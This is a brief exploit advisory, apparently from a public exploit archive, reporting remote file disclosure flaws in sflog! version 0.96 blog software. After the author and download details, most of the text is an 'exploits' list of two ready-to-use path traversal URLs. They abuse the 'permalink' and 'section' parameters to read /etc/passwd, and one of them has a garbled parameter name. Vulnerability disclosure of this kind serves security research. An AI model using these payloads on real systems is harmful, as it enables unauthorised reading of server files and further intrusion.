sflog! version 0.96 suffers from remote file disclosure vulnerabilities.
903a550b4184735fac47d3cc4a24d3c6b463e6bc602aeee386ab5598d97d2cee
sflog! 0.96 remote file disclosure vulnerabilities
download http://sourceforge.net/projects/sflog/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://localhost/sflog/index.php?blog=test§ion=../../../../../../../../../../etc/passwd